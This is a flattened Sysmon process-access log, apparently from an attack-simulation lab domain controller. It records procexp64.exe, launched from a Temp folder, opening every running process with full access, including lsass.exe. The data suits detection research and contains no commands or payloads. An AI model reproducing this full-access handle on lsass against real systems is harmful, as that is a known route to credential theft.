15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788577Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.986{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788576Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:22.736{732C744F-151A-600B-0D00-00000000A301}6248C:\Windows\system32\svchost.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788575Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 